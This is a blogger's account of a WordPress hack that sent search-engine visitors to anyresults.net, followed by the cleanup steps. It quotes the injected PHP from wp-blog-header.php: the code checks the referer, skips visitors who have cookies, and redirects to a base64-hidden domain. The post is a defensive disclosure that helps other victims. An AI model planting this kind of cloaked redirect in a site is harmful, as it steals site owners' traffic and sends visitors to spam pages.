Help for the anyresults.net Hack
My biggest blog was hacked recently. I “should” have caught on to it much more quickly but I didn’t. When traffic dropped by about 1000 people a day and my income majorly plummeted I started to take notice but I was at a loss as to how to explain it. I did see a serious lack of Google traffic so I thought maybe I got slapped for some reason. I don’t utilize any blackhat SEO methods but my content has been getting ripped off and republished left and right lately. My SERPs remained the same though, so I was VERY confused.
Then a blog reader mentioned to me that when she clicked on a link to my blog in the Google reader she would be redirected to a site called anyresults.net. She even researched it a bit and sent me a link to a discussion about this very issue. It is a hack affecting thousands of Wordpress blogs. Basically it steals all of your search engine traffic…via AOL, Google, Yahoo, MSN, you name it. If a search result brings up a link to your site the visitor would be redirected to anyresults.net and not your site. I erased my cookies and tried it myself and sure enough I was redirected every time. I could even search for my blog by name and be redirected. By now I was FURIOUS. I lost some major moola this week because some jerk-off stole traffic that should have been mine…Adsense, affiliate income, ad networks…all were suffering.
After I started looking for solutions I also found some people saying that Google ended up banning them for redirecting to a spam site! They got hacked and then slapped…talk about and insult after injury.
To get rid of the hack I tried the “solution” found here. It was useless. Mostly this thread seems full of people who assume you were to stupid to upgrade and that is why you got hacked. I was hacked while running the latest version, 2.5.1, so there goes that theory. I looked in my MySQL database for image being used as a plugin and there wasn’t one. I also deleted this string: rss_f541b3abd05e7962fcab37737f40fad8. It did nothing. I even deactivated all plugins and the problem was still there so clearly it is NOT a plugin issue.
Just like this blogger I did find this code in my wp-blog-header.php file:
?php \
$seref=array(”google”,”msn”,”live”,”altavista”,”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser=”1″; break; }
if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit; }?>
This is NOT supposed to be there. I deleted it but this in itself did not fix the issue. So I copied over all the files in the main WP directory with fresh, clean files and the problem was fixed. I wish I had known about this before I scoured my database and reinstalled a clean version of each plugin. Hope it helps some others affected by this attack.
While I was working this out I also added a blank index file to my plugins folder so people can’t see what plugins I am using and to find back doors. I also deleted all of my users and checked my permission settings. Hopefully my traffic will get back to normal and I can avoid further attacks…what a major pain in the neck.
Now I need to check out all my other blogs.
If you're new here, you may want to subscribe to my RSS feed. Thanks for visiting!



